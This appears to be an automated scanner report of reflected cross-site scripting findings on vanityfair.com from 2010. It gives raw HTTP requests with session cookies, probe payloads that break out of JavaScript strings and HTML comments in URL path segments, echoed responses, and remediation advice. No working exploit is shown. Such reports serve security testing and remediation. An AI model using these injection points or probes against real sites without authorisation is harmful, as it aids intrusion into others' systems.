GET /online/oscars/boardwalk-empireeab64'%3b1aceb5a8b7a/ HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:32 GMT Date: Mon, 29 Nov 2010 16:49:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/boardwalk-empireeab64';1aceb5a8b7a', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803c8'%3be4ad757f0b was submitted in the REST URL parameter 3. This input was echoed as 803c8';e4ad757f0b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/glee-cap803c8'%3be4ad757f0b/ HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:33 GMT Date: Mon, 29 Nov 2010 16:49:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/glee-cap803c8';e4ad757f0b', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 16bdf-->0c6977c81a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/201016bdf-->0c6977c81a9/11/as-im-sure-some-of.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:12 GMT Date: Mon, 29 Nov 2010 16:50:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[964223740]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/201016bdf-->0c6977c81a9/11/as-im-sure-some-of.html?proxyuri=online%2Fwolcott%2F201016bdf--%3E0c6977c81a9%2F11%2Fas-im-sure-some-of.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f18f7'%3b5fc559ddf94 was submitted in the REST URL parameter 3. This input was echoed as f18f7';5fc559ddf94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010f18f7'%3b5fc559ddf94/11/as-im-sure-some-of.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:10 GMT Date: Mon, 29 Nov 2010 16:50:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77401
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010f18f7';5fc559ddf94/11/as-im-sure-some-of.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally. ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b3a6'%3b4834cb91509 was submitted in the REST URL parameter 4. This input was echoed as 9b3a6';4834cb91509 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/119b3a6'%3b4834cb91509/as-im-sure-some-of.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:23 GMT Date: Mon, 29 Nov 2010 16:50:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/119b3a6';4834cb91509/as-im-sure-some-of.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
The value of REST URL parameter 4 is copied into an HTML comment. The payload c084b-->7681ea82b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11c084b-->7681ea82b5/as-im-sure-some-of.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:24 GMT Date: Mon, 29 Nov 2010 16:50:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... se bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[743244606]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11c084b-->7681ea82b5/as-im-sure-some-of.html?proxyuri=online%2Fwolcott%2F2010%2F11c084b--%3E7681ea82b5%2Fas-im-sure-some-of.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 8b28f-->25d5bfdd754 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11/as-im-sure-some-of.html8b28f-->25d5bfdd754 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:35 GMT Date: Mon, 29 Nov 2010 16:50:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa66'%3b258d3baed92 was submitted in the REST URL parameter 5. This input was echoed as faa66';258d3baed92 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/11/as-im-sure-some-of.htmlfaa66'%3b258d3baed92 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:33 GMT Date: Mon, 29 Nov 2010 16:50:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77401
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.htmlfaa66';258d3baed92', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e16f'%3bb4cab99c097 was submitted in the REST URL parameter 3. This input was echoed as 7e16f';b4cab99c097 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/20107e16f'%3bb4cab99c097/11/it-saddens-me-to-think.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:29 GMT Date: Mon, 29 Nov 2010 16:49:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77405
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/20107e16f';b4cab99c097/11/it-saddens-me-to-think.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globa ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload b91e8-->d5a43465373 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010b91e8-->d5a43465373/11/it-saddens-me-to-think.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:31 GMT Date: Mon, 29 Nov 2010 16:49:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80323
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload b7360-->c91f9ff0b94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11b7360-->c91f9ff0b94/it-saddens-me-to-think.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:46 GMT Date: Mon, 29 Nov 2010 16:49:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... se bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[888772653]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11b7360-->c91f9ff0b94/it-saddens-me-to-think.html?proxyuri=online%2Fwolcott%2F2010%2F11b7360--%3Ec91f9ff0b94%2Fit-saddens-me-to-think.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae468'%3bd9a2d6b8010 was submitted in the REST URL parameter 4. This input was echoed as ae468';d9a2d6b8010 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/11ae468'%3bd9a2d6b8010/it-saddens-me-to-think.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:43 GMT Date: Mon, 29 Nov 2010 16:49:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77405
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/11ae468';d9a2d6b8010/it-saddens-me-to-think.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5e13'%3bec9601eadeb was submitted in the REST URL parameter 5. This input was echoed as a5e13';ec9601eadeb in the application's response.
